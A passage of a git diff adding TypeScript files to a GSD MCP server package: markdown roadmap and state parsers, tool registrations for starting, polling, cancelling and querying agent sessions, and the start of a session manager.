+  const tableSection = content.match(/## (?:Slice[s]?|Slice Overview|Slice Table)\s*\n([\s\S]*?)(?=\n##|\n$|$)/i);
+  if (tableSection) {
+    const lines = tableSection[1].split('\n');
+    for (const line of lines) {
+      if (!line.includes('|')) continue;
+      const cells = line.split('|').map((c) => c.trim()).filter(Boolean);
+      if (cells.length < 4) continue;
+      if (cells[0] === 'ID' || cells[0].startsWith('--')) continue;
+
+      const id = cells[0].match(/S\d+/)?.[0];
+      if (!id) continue;
+
+      const done = cells.some((c) => c === '\u2611' || c === '\u2705' || c.toLowerCase() === 'done');
+      const depends = (cells[3] ?? '').replace(/\u2014/g, '').split(',').map((d) => d.trim()).filter(Boolean);
+
+      results.push({
+        id,
+        title: cells[1] ?? '',
+        risk: cells[2] ?? 'medium',
+        depends,
+        done,
+        demo: cells[5] ?? '',
+      });
+    }
+    if (results.length > 0) return results;
+  }
+
+  // Try checkbox format: - [x] **S01: Title** `risk:high` `depends:[S01]`
+  const checkboxRe = /^-\s+\[([ xX])\]\s+\*\*(S\d+):\s*(.+?)\*\*(?:.*?`risk:(\w+)`)?(?:.*?`depends:\[([^\]]*)\]`)?/gm;
+  let match: RegExpExecArray | null;
+  while ((match = checkboxRe.exec(content)) !== null) {
+    const [, checked, id, title, risk, deps] = match;
+    results.push({
+      id,
+      title: title.trim(),
+      risk: risk ?? 'medium',
+      depends: deps ? deps.split(',').map((d) => d.trim()).filter(Boolean) : [],
+      done: checked !== ' ',
+      demo: '',
+    });
+  }
+  if (results.length > 0) return results;
+
+  // Try prose headers: ## S01: Title
+  const headerRe = /^##\s+(S\d+):\s*(.+)/gm;
+  while ((match = headerRe.exec(content)) !== null) {
+    results.push({
+      id: match[1],
+      title: match[2].trim(),
+      risk: 'medium',
+      depends: [],
+      done: false,
+      demo: '',
+    });
+  }
+
+  return results;
+}
+
+// ---------------------------------------------------------------------------
+// PLAN.md task parser
+// ---------------------------------------------------------------------------
+
+function parseSlicePlanTasks(content: string): Array<{ id: string; title: string; done: boolean }> {
+  const results: Array<{ id: string; title: string; done: boolean }> = [];
+
+  // Checkbox format: - [x] **T01: Title** — description
+  const taskRe = /^-\s+\[([ xX])\]\s+\*\*(T\d+):\s*(.+?)\*\*/gm;
+  let match: RegExpExecArray | null;
+  while ((match = taskRe.exec(content)) !== null) {
+    results.push({
+      id: match[2],
+      title: match[3].trim(),
+      done: match[1] !== ' ',
+    });
+  }
+  if (results.length > 0) return results;
+
+  // H3 format: ### T01: Title
+  const h3Re = /^###\s+(T\d+):\s*(.+)/gm;
+  while ((match = h3Re.exec(content)) !== null) {
+    results.push({
+      id: match[1],
+      title: match[2].trim(),
+      done: false,
+    });
+  }
+
+  return results;
+}
+
+// ---------------------------------------------------------------------------
+// Milestone title from CONTEXT.md or ROADMAP.md H1
+// ---------------------------------------------------------------------------
+
+function readMilestoneTitle(gsdRoot: string, mid: string): string {
+  const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT');
+  if (ctxPath && existsSync(ctxPath)) {
+    const content = readFileSync(ctxPath, 'utf-8');
+    const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m);
+    if (h1) return h1[1].trim();
+  }
+
+  const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP');
+  if (roadmapPath && existsSync(roadmapPath)) {
+    const content = readFileSync(roadmapPath, 'utf-8');
+    const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m);
+    if (h1) return h1[1].trim();
+  }
+
+  return mid;
+}
+
+function readVision(gsdRoot: string, mid: string): string {
+  const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP');
+  if (!roadmapPath || !existsSync(roadmapPath)) return '';
+
+  const content = readFileSync(roadmapPath, 'utf-8');
+  const section = content.match(/## Vision\s*\n([\s\S]*?)(?=\n##|\n$|$)/i);
+  return section ? section[1].trim() : '';
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export function readRoadmap(projectDir: string, filterMilestoneId?: string): RoadmapResult {
+  const gsd = resolveGsdRoot(projectDir);
+  let milestoneIds = findMilestoneIds(gsd);
+
+  if (filterMilestoneId) {
+    milestoneIds = milestoneIds.filter((id) => id === filterMilestoneId);
+  }
+
+  const milestones: MilestoneInfo[] = [];
+
+  for (const mid of milestoneIds) {
+    const title = readMilestoneTitle(gsd, mid);
+    const vision = readVision(gsd, mid);
+
+    const summaryPath = resolveMilestoneFile(gsd, mid, 'SUMMARY');
+    const hasSummary = summaryPath !== null && existsSync(summaryPath);
+
+    const roadmapPath = resolveMilestoneFile(gsd, mid, 'ROADMAP');
+    let roadmapSlices: ReturnType<typeof parseRoadmapTable> = [];
+    if (roadmapPath && existsSync(roadmapPath)) {
+      roadmapSlices = parseRoadmapTable(readFileSync(roadmapPath, 'utf-8'));
+    }
+
+    const fsSliceIds = findSliceIds(gsd, mid);
+    const sliceIdSet = new Set([
+      ...roadmapSlices.map((s) => s.id),
+      ...fsSliceIds,
+    ]);
+
+    const slices: SliceInfo[] = [];
+    for (const sid of Array.from(sliceIdSet).sort()) {
+      const roadmapEntry = roadmapSlices.find((s) => s.id === sid);
+      const taskFiles = findTaskFiles(gsd, mid, sid);
+
+      const planPath = resolveSliceFile(gsd, mid, sid, 'PLAN');
+      let planTasks: ReturnType<typeof parseSlicePlanTasks> = [];
+      if (planPath && existsSync(planPath)) {
+        planTasks = parseSlicePlanTasks(readFileSync(planPath, 'utf-8'));
+      }
+
+      const tasks: TaskInfo[] = [];
+      const seenIds = new Set<string>();
+
+      for (const pt of planTasks) {
+        const fsTask = taskFiles.find((t) => t.id === pt.id);
+        const done = fsTask?.hasSummary ?? pt.done;
+        tasks.push({ id: pt.id, title: pt.title, status: done ? 'done' : 'pending' });
+        seenIds.add(pt.id);
+      }
+      for (const ft of taskFiles) {
+        if (seenIds.has(ft.id)) continue;
+        tasks.push({ id: ft.id, title: ft.id, status: ft.hasSummary ? 'done' : 'pending' });
+      }
+
+      const allDone = tasks.length > 0 && tasks.every((t) => t.status === 'done');
+      const anyDone = tasks.some((t) => t.status === 'done');
+      const sliceStatus: SliceInfo['status'] = allDone ? 'done' : anyDone ? 'active' : 'pending';
+
+      slices.push({
+        id: sid,
+        title: roadmapEntry?.title ?? sid,
+        status: sliceStatus,
+        risk: roadmapEntry?.risk ?? 'medium',
+        depends: roadmapEntry?.depends ?? [],
+        demo: roadmapEntry?.demo ?? '',
+        tasks,
+      });
+    }
+
+    const allSlicesDone = slices.length > 0 && slices.every((s) => s.status === 'done');
+    const anySliceActive = slices.some((s) => s.status === 'active' || s.status === 'done');
+    const milestoneStatus: MilestoneInfo['status'] = hasSummary
+      ? 'done'
+      : allSlicesDone ? 'done' : anySliceActive ? 'active' : 'pending';
+
+    milestones.push({ id: mid, title, status: milestoneStatus, vision, slices });
+  }
+
+  return { milestones };
+}
diff --git a/packages/mcp-server/src/readers/state.ts b/packages/mcp-server/src/readers/state.ts
new file mode 100644
index 000000000..93ea7d38f
--- /dev/null
+++ b/packages/mcp-server/src/readers/state.ts
@@ -0,0 +1,223 @@
+// GSD MCP Server — project state reader
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readFileSync, existsSync } from 'node:fs';
+import {
+  resolveGsdRoot,
+  resolveRootFile,
+  findMilestoneIds,
+  resolveMilestoneDir,
+  resolveMilestoneFile,
+  findSliceIds,
+  findTaskFiles,
+} from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export interface ProgressResult {
+  activeMilestone: { id: string; title: string } | null;
+  activeSlice: { id: string; title: string } | null;
+  activeTask: { id: string; title: string } | null;
+  phase: string;
+  milestones: { total: number; done: number; active: number; pending: number; parked: number };
+  slices: { total: number; done: number; active: number; pending: number };
+  tasks: { total: number; done: number; pending: number };
+  requirements: { active: number; validated: number; deferred: number; outOfScope: number } | null;
+  blockers: string[];
+  nextAction: string;
+}
+
+// ---------------------------------------------------------------------------
+// STATE.md parser
+// ---------------------------------------------------------------------------
+
+function parseBoldField(content: string, label: string): string | null {
+  const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i');
+  const m = content.match(re);
+  return m ? m[1].trim() : null;
+}
+
+function parseActiveRef(value: string | null): { id: string; title: string } | null {
+  if (!value || value.toLowerCase() === 'none' || value === '—') return null;
+  // "M001: Flight Simulator" or "M001"
+  const m = value.match(/^(M\d+|S\d+|T\d+):?\s*(.*)/);
+  if (m) return { id: m[1], title: m[2] || m[1] };
+  return { id: value, title: value };
+}
+
+function parsePhase(value: string | null): string {
+  if (!value) return 'unknown';
+  const lower = value.toLowerCase().trim();
+  if (lower.includes('research') || lower.includes('discuss')) return 'research';
+  if (lower.includes('plan')) return 'plan';
+  if (lower.includes('execut')) return 'execute';
+  if (lower.includes('complete') || lower.includes('done')) return 'complete';
+  return lower;
+}
+
+function parseRequirementsLine(value: string | null): ProgressResult['requirements'] | null {
+  if (!value) return null;
+  const active = value.match(/(\d+)\s*active/i);
+  const validated = value.match(/(\d+)\s*validated/i);
+  const deferred = value.match(/(\d+)\s*deferred/i);
+  const outOfScope = value.match(/(\d+)\s*out.of.scope/i);
+  if (!active && !validated && !deferred && !outOfScope) return null;
+  return {
+    active: active ? parseInt(active[1], 10) : 0,
+    validated: validated ? parseInt(validated[1], 10) : 0,
+    deferred: deferred ? parseInt(deferred[1], 10) : 0,
+    outOfScope: outOfScope ? parseInt(outOfScope[1], 10) : 0,
+  };
+}
+
+function parseBlockers(content: string): string[] {
+  const section = content.match(/## Blockers\s*\n([\s\S]*?)(?=\n##|\n$|$)/i);
+  if (!section) return [];
+  return section[1]
+    .split('\n')
+    .map((l) => l.replace(/^[-*]\s*/, '').trim())
+    .filter(Boolean);
+}
+
+function parseNextAction(content: string): string {
+  const section = content.match(/## Next Action\s*\n([\s\S]*?)(?=\n##|\n$|$)/i);
+  if (!section) return '';
+  return section[1].trim().split('\n')[0] || '';
+}
+
+// ---------------------------------------------------------------------------
+// Milestone registry from STATE.md
+// ---------------------------------------------------------------------------
+
+interface RegistryEntry { id: string; status: 'done' | 'active' | 'pending' | 'parked' }
+
+function parseMilestoneRegistry(content: string): RegistryEntry[] {
+  const section = content.match(/## Milestone Registry\s*\n([\s\S]*?)(?=\n##|\n$|$)/i);
+  if (!section) return [];
+  const entries: RegistryEntry[] = [];
+  for (const line of section[1].split('\n')) {
+    const m = line.match(/[-*]\s*(☑|✅|🔄|⬜|⏸)\s*\*\*(M\d+):\*\*/);
+    if (!m) continue;
+    const [, icon, id] = m;
+    let status: RegistryEntry['status'] = 'pending';
+    if (icon === '☑' || icon === '✅') status = 'done';
+    else if (icon === '🔄') status = 'active';
+    else if (icon === '⏸') status = 'parked';
+    entries.push({ id, status });
+  }
+  return entries;
+}
+
+// ---------------------------------------------------------------------------
+// Count slices/tasks by walking filesystem
+// ---------------------------------------------------------------------------
+
+function countSlicesAndTasks(gsdRoot: string, milestoneIds: string[]): {
+  slices: ProgressResult['slices'];
+  tasks: ProgressResult['tasks'];
+} {
+  let sliceTotal = 0, sliceDone = 0, sliceActive = 0;
+  let taskTotal = 0, taskDone = 0;
+
+  for (const mid of milestoneIds) {
+    const sliceIds = findSliceIds(gsdRoot, mid);
+    sliceTotal += sliceIds.length;
+
+    for (const sid of sliceIds) {
+      const tasks = findTaskFiles(gsdRoot, mid, sid);
+      taskTotal += tasks.length;
+
+      const allDone = tasks.length > 0 && tasks.every((t) => t.hasSummary);
+      const anyDone = tasks.some((t) => t.hasSummary);
+
+      if (allDone) {
+        sliceDone++;
+        taskDone += tasks.length;
+      } else {
+        if (anyDone) sliceActive++;
+        taskDone += tasks.filter((t) => t.hasSummary).length;
+      }
+    }
+  }
+
+  return {
+    slices: {
+      total: sliceTotal,
+      done: sliceDone,
+      active: sliceActive,
+      pending: sliceTotal - sliceDone - sliceActive,
+    },
+    tasks: { total: taskTotal, done: taskDone, pending: taskTotal - taskDone },
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export function readProgress(projectDir: string): ProgressResult {
+  const gsd = resolveGsdRoot(projectDir);
+  const statePath = resolveRootFile(gsd, 'STATE.md');
+
+  // Defaults
+  const result: ProgressResult = {
+    activeMilestone: null,
+    activeSlice: null,
+    activeTask: null,
+    phase: 'unknown',
+    milestones: { total: 0, done: 0, active: 0, pending: 0, parked: 0 },
+    slices: { total: 0, done: 0, active: 0, pending: 0 },
+    tasks: { total: 0, done: 0, pending: 0 },
+    requirements: null,
+    blockers: [],
+    nextAction: '',
+  };
+
+  if (!existsSync(statePath)) {
+    // No STATE.md — derive from filesystem only
+    const milestoneIds = findMilestoneIds(gsd);
+    result.milestones.total = milestoneIds.length;
+    result.milestones.pending = milestoneIds.length;
+    const counts = countSlicesAndTasks(gsd, milestoneIds);
+    result.slices = counts.slices;
+    result.tasks = counts.tasks;
+    return result;
+  }
+
+  const content = readFileSync(statePath, 'utf-8');
+
+  // Parse STATE.md fields
+  result.activeMilestone = parseActiveRef(parseBoldField(content, 'Active Milestone'));
+  result.activeSlice = parseActiveRef(parseBoldField(content, 'Active Slice'));
+  result.activeTask = parseActiveRef(parseBoldField(content, 'Active Task'));
+  result.phase = parsePhase(parseBoldField(content, 'Phase'));
+  result.requirements = parseRequirementsLine(parseBoldField(content, 'Requirements Status'));
+  result.blockers = parseBlockers(content);
+  result.nextAction = parseNextAction(content);
+
+  // Milestone counts from registry
+  const registry = parseMilestoneRegistry(content);
+  if (registry.length > 0) {
+    result.milestones.total = registry.length;
+    result.milestones.done = registry.filter((e) => e.status === 'done').length;
+    result.milestones.active = registry.filter((e) => e.status === 'active').length;
+    result.milestones.parked = registry.filter((e) => e.status === 'parked').length;
+    result.milestones.pending = registry.length -
+      result.milestones.done - result.milestones.active - result.milestones.parked;
+  } else {
+    // Fallback: count directories
+    const milestoneIds = findMilestoneIds(gsd);
+    result.milestones.total = milestoneIds.length;
+    result.milestones.pending = milestoneIds.length;
+  }
+
+  // Slice/task counts from filesystem
+  const milestoneIds = findMilestoneIds(gsd);
+  const counts = countSlicesAndTasks(gsd, milestoneIds);
+  result.slices = counts.slices;
+  result.tasks = counts.tasks;
+
+  return result;
+}
diff --git a/packages/mcp-server/src/server.ts b/packages/mcp-server/src/server.ts
new file mode 100644
index 000000000..f684700ed
--- /dev/null
+++ b/packages/mcp-server/src/server.ts
@@ -0,0 +1,409 @@
+/**
+ * MCP Server — registers GSD orchestration + read-only project state tools.
+ *
+ * Session tools (6): gsd_execute, gsd_status, gsd_result, gsd_cancel, gsd_query, gsd_resolve_blocker
+ * Read-only tools (6): gsd_progress, gsd_roadmap, gsd_history, gsd_doctor, gsd_captures, gsd_knowledge
+ *
+ * Uses dynamic imports for @modelcontextprotocol/sdk because TS Node16
+ * cannot resolve the SDK's subpath exports statically (same pattern as
+ * src/mcp-server.ts in the main package).
+ */
+
+import { readFile, readdir, stat } from 'node:fs/promises';
+import { join, resolve } from 'node:path';
+import { z } from 'zod';
+import type { SessionManager } from './session-manager.js';
+import { readProgress } from './readers/state.js';
+import { readRoadmap } from './readers/roadmap.js';
+import { readHistory } from './readers/metrics.js';
+import { readCaptures } from './readers/captures.js';
+import { readKnowledge } from './readers/knowledge.js';
+import { runDoctorLite } from './readers/doctor-lite.js';
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+const MCP_PKG = '@modelcontextprotocol/sdk';
+const SERVER_NAME = 'gsd';
+const SERVER_VERSION = '2.53.0';
+
+// ---------------------------------------------------------------------------
+// Tool result helpers
+// ---------------------------------------------------------------------------
+
+/** Wrap a JSON-serializable value as MCP tool content. */
+function jsonContent(data: unknown): { content: Array<{ type: 'text'; text: string }> } {
+  return { content: [{ type: 'text' as const, text: JSON.stringify(data, null, 2) }] };
+}
+
+/** Return an MCP error response. */
+function errorContent(message: string): { isError: true; content: Array<{ type: 'text'; text: string }> } {
+  return { isError: true, content: [{ type: 'text' as const, text: message }] };
+}
+
+// ---------------------------------------------------------------------------
+// gsd_query filesystem reader
+// ---------------------------------------------------------------------------
+
+async function readProjectState(projectDir: string, _query: string): Promise<Record<string, unknown>> {
+  const gsdDir = join(resolve(projectDir), '.gsd');
+  const result: Record<string, unknown> = { projectDir: resolve(projectDir) };
+
+  // STATE.md — current execution state
+  try {
+    result.state = await readFile(join(gsdDir, 'STATE.md'), 'utf-8');
+  } catch {
+    result.state = null;
+  }
+
+  // PROJECT.md — project description
+  try {
+    result.project = await readFile(join(gsdDir, 'PROJECT.md'), 'utf-8');
+  } catch {
+    result.project = null;
+  }
+
+  // REQUIREMENTS.md — requirement contract
+  try {
+    result.requirements = await readFile(join(gsdDir, 'REQUIREMENTS.md'), 'utf-8');
+  } catch {
+    result.requirements = null;
+  }
+
+  // List milestones with basic metadata
+  const milestonesDir = join(gsdDir, 'milestones');
+  try {
+    const entries = await readdir(milestonesDir, { withFileTypes: true });
+    const milestones: Array<{ id: string; hasRoadmap: boolean; hasSummary: boolean }> = [];
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+      const mDir = join(milestonesDir, entry.name);
+      const hasRoadmap = await fileExists(join(mDir, `${entry.name}-ROADMAP.md`));
+      const hasSummary = await fileExists(join(mDir, `${entry.name}-SUMMARY.md`));
+      milestones.push({ id: entry.name, hasRoadmap, hasSummary });
+    }
+    result.milestones = milestones;
+  } catch {
+    result.milestones = [];
+  }
+
+  return result;
+}
+
+async function fileExists(path: string): Promise<boolean> {
+  try {
+    await stat(path);
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// MCP Server type — minimal interface for the dynamically-imported McpServer
+// ---------------------------------------------------------------------------
+
+interface McpServerInstance {
+  tool(name: string, description: string, params: Record<string, unknown>, handler: (args: Record<string, unknown>) => Promise<unknown>): unknown;
+  connect(transport: unknown): Promise<void>;
+  close(): Promise<void>;
+}
+
+// ---------------------------------------------------------------------------
+// createMcpServer
+// ---------------------------------------------------------------------------
+
+/**
+ * Create and configure an MCP server with 12 GSD tools (6 session + 6 read-only).
+ *
+ * Returns the McpServer instance — call `connect(transport)` to start serving.
+ * Uses dynamic imports for the MCP SDK to avoid TS subpath resolution issues.
+ */
+export async function createMcpServer(sessionManager: SessionManager): Promise<{
+  server: McpServerInstance;
+}> {
+  // Dynamic import — same workaround as src/mcp-server.ts
+  const mcpMod = await import(`${MCP_PKG}/server/mcp.js`);
+  const McpServer = mcpMod.McpServer;
+
+  const server: McpServerInstance = new McpServer(
+    { name: SERVER_NAME, version: SERVER_VERSION },
+    { capabilities: { tools: {} } },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_execute — start a new GSD auto-mode session
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_execute',
+    'Start a GSD auto-mode session for a project directory. Returns a sessionId for tracking.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      command: z.string().optional().describe('Command to send (default: "/gsd auto")'),
+      model: z.string().optional().describe('Model ID override'),
+      bare: z.boolean().optional().describe('Run in bare mode (skip user config)'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, command, model, bare } = args as {
+        projectDir: string; command?: string; model?: string; bare?: boolean;
+      };
+      try {
+        const sessionId = await sessionManager.startSession(projectDir, { command, model, bare });
+        return jsonContent({ sessionId, status: 'started' });
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_status — poll session status
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_status',
+    'Get the current status of a GSD session including progress, recent events, and pending blockers.',
+    {
+      sessionId: z.string().describe('Session ID returned from gsd_execute'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { sessionId } = args as { sessionId: string };
+      try {
+        const session = sessionManager.getSession(sessionId);
+        if (!session) return errorContent(`Session not found: ${sessionId}`);
+
+        const durationMs = Date.now() - session.startTime;
+        const toolCallCount = session.events.filter(
+          (e) => (e as Record<string, unknown>).type === 'tool_use' ||
+                 (e as Record<string, unknown>).type === 'tool_execution_start'
+        ).length;
+
+        return jsonContent({
+          status: session.status,
+          progress: {
+            eventCount: session.events.length,
+            toolCalls: toolCallCount,
+          },
+          recentEvents: session.events.slice(-10),
+          pendingBlocker: session.pendingBlocker
+            ? {
+                id: session.pendingBlocker.id,
+                method: session.pendingBlocker.method,
+                message: session.pendingBlocker.message,
+              }
+            : null,
+          cost: session.cost,
+          durationMs,
+        });
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_result — get accumulated session result
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_result',
+    'Get the result of a GSD session. Returns partial results if the session is still running.',
+    {
+      sessionId: z.string().describe('Session ID returned from gsd_execute'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { sessionId } = args as { sessionId: string };
+      try {
+        const result = sessionManager.getResult(sessionId);
+        return jsonContent(result);
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_cancel — cancel a running session
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_cancel',
+    'Cancel a running GSD session. Aborts the current operation and stops the process.',
+    {
+      sessionId: z.string().describe('Session ID returned from gsd_execute'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { sessionId } = args as { sessionId: string };
+      try {
+        await sessionManager.cancelSession(sessionId);
+        return jsonContent({ cancelled: true });
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_query — read project state from filesystem (no session needed)
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_query',
+    'Query GSD project state from the filesystem. Returns STATE.md, PROJECT.md, requirements, and milestone listing. Does not require an active session.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      query: z.string().describe('What to query (e.g. "status", "milestones", "requirements")'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, query } = args as { projectDir: string; query: string };
+      try {
+        const state = await readProjectState(projectDir, query);
+        return jsonContent(state);
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_resolve_blocker — resolve a pending blocker
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_resolve_blocker',
+    'Resolve a pending blocker in a GSD session by sending a response to the UI request.',
+    {
+      sessionId: z.string().describe('Session ID returned from gsd_execute'),
+      response: z.string().describe('Response to send for the pending blocker'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { sessionId, response } = args as { sessionId: string; response: string };
+      try {
+        await sessionManager.resolveBlocker(sessionId, response);
+        return jsonContent({ resolved: true });
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // =======================================================================
+  // READ-ONLY TOOLS — no session required, pure filesystem reads
+  // =======================================================================
+
+  // -----------------------------------------------------------------------
+  // gsd_progress — structured project progress metrics
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_progress',
+    'Get structured project progress: active milestone/slice/task, phase, completion counts, blockers, and next action. No session required — reads directly from .gsd/ on disk.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir } = args as { projectDir: string };
+      try {
+        return jsonContent(readProgress(projectDir));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_roadmap — milestone/slice/task structure with status
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_roadmap',
+    'Get the full project roadmap structure: milestones with their slices, tasks, status, risk, and dependencies. Optionally filter to a single milestone. No session required.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      milestoneId: z.string().optional().describe('Filter to a specific milestone (e.g. "M001")'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, milestoneId } = args as { projectDir: string; milestoneId?: string };
+      try {
+        return jsonContent(readRoadmap(projectDir, milestoneId));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_history — execution history with cost/token metrics
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_history',
+    'Get execution history with cost, token usage, model, and duration per unit. Returns totals across all units. No session required.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      limit: z.number().optional().describe('Max entries to return (most recent first). Default: all.'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, limit } = args as { projectDir: string; limit?: number };
+      try {
+        return jsonContent(readHistory(projectDir, limit));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_doctor — lightweight structural health check
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_doctor',
+    'Run a lightweight structural health check on the .gsd/ directory. Checks for missing files, status inconsistencies, and orphaned state. No session required.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      scope: z.string().optional().describe('Limit checks to a specific milestone (e.g. "M001")'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, scope } = args as { projectDir: string; scope?: string };
+      try {
+        return jsonContent(runDoctorLite(projectDir, scope));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_captures — pending captures and ideas
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_captures',
+    'Get captured ideas and thoughts from CAPTURES.md with triage status. Filter by pending, actionable, or all. No session required.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+      filter: z.enum(['all', 'pending', 'actionable']).optional().describe('Filter captures (default: "all")'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir, filter } = args as { projectDir: string; filter?: 'all' | 'pending' | 'actionable' };
+      try {
+        return jsonContent(readCaptures(projectDir, filter ?? 'all'));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  // -----------------------------------------------------------------------
+  // gsd_knowledge — project knowledge base
+  // -----------------------------------------------------------------------
+  server.tool(
+    'gsd_knowledge',
+    'Get the project knowledge base: rules, patterns, and lessons learned accumulated during development. No session required.',
+    {
+      projectDir: z.string().describe('Absolute path to the project directory'),
+    },
+    async (args: Record<string, unknown>) => {
+      const { projectDir } = args as { projectDir: string };
+      try {
+        return jsonContent(readKnowledge(projectDir));
+      } catch (err) {
+        return errorContent(err instanceof Error ? err.message : String(err));
+      }
+    },
+  );
+
+  return { server };
+}
diff --git a/packages/mcp-server/src/session-manager.ts b/packages/mcp-server/src/session-manager.ts
new file mode 100644
index 000000000..841941196
--- /dev/null
+++ b/packages/mcp-server/src/session-manager.ts
@@ -0,0 +1,328 @@
+/**
+ * SessionManager — manages RpcClient lifecycle for background GSD execution.
+ *
+ * One active session per projectDir. Tracks events in a ring buffer,
+ * detects blockers, tracks terminal state, and accumulates cost using
+ * the cumulative-max pattern (K004).
+ */
+
+import { execSync } from 'node:child_process';
+import { resolve } from 'node:path';
+import { RpcClient } from '@gsd-build/rpc-client';
+import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+import type {
+  ManagedSession,
+  ExecuteOptions,
+  PendingBlocker,
+  CostAccumulator,
+  SessionStatus,
+} from './types.js';
+import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Inlined detection logic (from headless-events.ts — no internal package imports)
+// ---------------------------------------------------------------------------
+
+const FIRE_AND_FORGET_METHODS = new Set([
+  'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text',
+]);
+
+const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped'];
+
+function isTerminalNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false;
+  const message = String(event.message ?? '').toLowerCase();
+  return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix));
+}
+
+function isBlockedNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false;
+  const message = String(event.message ?? '').toLowerCase();
+  return message.includes('blocked:');
+}
+
+function isBlockingUIRequest(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request') return false;
+  const method = String(event.method ?? '');
+  return !FIRE_AND_FORGET_METHODS.has(method);
+}
+
+// ---------------------------------------------------------------------------
+// SessionManager
+// ---------------------------------------------------------------------------
+
+export class SessionManager {
+  /** Sessions keyed by projectDir for duplicate-start prevention */
+  private sessions = new Map<string, ManagedSession>();
+
+  /**
+   * Start a new GSD auto-mode session for the given project directory.
+   *
+   * Rejects if a session already exists for this projectDir.
+   * Creates an RpcClient, starts the process, performs the v2 init handshake,
+   * wires event tracking, and sends '/gsd auto' to begin execution.
+   */
+  async startSession(projectDir: string, options: ExecuteOptions = {}): Promise<string> {
+    if (!projectDir || projectDir.trim() === '') {
+      throw new Error('projectDir is required and cannot be empty');
+    }
+
+    const resolvedDir = resolve(projectDir);
+
+    const existing = this.sessions.get(resolvedDir);
+    if (existing) {
+      throw new Error(
+        `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})`
+      );
+    }
+
+    const cliPath = options.cliPath ?? SessionManager.resolveCLIPath();
+
